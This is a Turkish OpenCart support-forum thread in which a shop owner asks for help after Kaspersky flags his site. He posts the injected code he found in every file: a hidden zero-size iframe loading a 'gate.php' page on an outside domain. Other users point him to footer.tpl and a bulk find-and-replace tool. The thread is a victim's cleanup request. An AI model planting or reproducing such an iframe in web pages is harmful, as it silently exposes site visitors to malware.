Sitemde virüs

patrqw

OpenCart-TR
Web sitesi
www.cdkeyburada.com
Merhabalar, arkadaşlar sitem de virüs var gibi görünüyor büyük olasılık lada o şekilde, bu konuda yardım istiyorum. kaspersky programının bana verdiği uyarı, resimler ektedir.
PHP:
gate.php?f=965430	Reddedildi: http://unclesammm.com/gate.php?f=965430 (şüpheli siteler veritabanı kullanılarak analiz edildi)
şimdiden teşekkür ederim.
[attachment=1213][attachment=1212]

Ekli dosyalar

• Untitled-2.jpg
    Untitled-2.jpg
    85.9 KB · Görüntüleme: 25
  • Untitled-1.jpg
    Untitled-1.jpg
    192.7 KB · Görüntüleme: 18

ferree

OpenCart-TR
RE: Sitemde v i r ü s

Link verirsen bakarız.

patrqw

OpenCart-TR
Web sitesi
www.cdkeyburada.com

TECHNOLOG' Alıntı:
herhangi bişey göremedim. antivirüs programının güncellemelerini tam yükle. belki de anlık bişeydi.

Farklı bilgisayarlardan Nod32 ve Avira ile denedim.. bir hata almıyorum, kaspersky her bir sayfa girdiğimde ayrı ayrı üşenmeden hatayı veriyor. ekteki dosyada hata mesajı; url veri tabanında bulundu diyor.

ferree

OpenCart-TR

Bende baktım herhangi bir sorun gözükmüyor.

gehennas

OpenCart-TR

senin siteden unclesamm.com a giden bişey var o yüzden veriyor muhtemelen hatayı

patrqw

OpenCart-TR
Web sitesi
www.cdkeyburada.com

Sitemin kaynak kodlarında en alt kısımda bu kod bulunuyor . Nasıl kaldırabilirim. Teşekkür ederim.
Kod:
<!--qpi--><iframe src=http://unclesammm.com/gate.php?f=965430   frameborder=0 marginheight=0 marginwidth=0 scrolling=0 width=0 height=0 border=0></iframe><!--/qpi-->

gehennas

OpenCart-TR

catalog/view/theme/default(veya mevcut tema hangisiyse)/template/common/footer.tpl

bu dosyayı aç, muhtemelen buradadır.

patrqw

OpenCart-TR
Web sitesi
www.cdkeyburada.com

Tüm dosyalara bulaşmış malesef tarama yaptım, çözüm arıyorum henüz tek tek sileceğim artık, teşekkür ederim yardımlarınız için.

Gökhan TAYLAN

OpenCart-TR

Tek Tek Silmek Sıkıntı ve Uzun Zaman Alacaktır Tüm Dosyalarınızda Olma İhtimali Var Özellikle JS dosyalarınıza Bulaşmış ise işiniz ciddi anlamda zordur bu aşamada nette bulabileceğiniz "advanced find and replace" Programı İşinizi Sorunsuzca Çözecektir.

patrqw' Alıntı:
Tüm dosyalara bulaşmış malesef tarama yaptım, çözüm arıyorum henüz tek tek sileceğim artık, teşekkür ederim yardımlarınız için.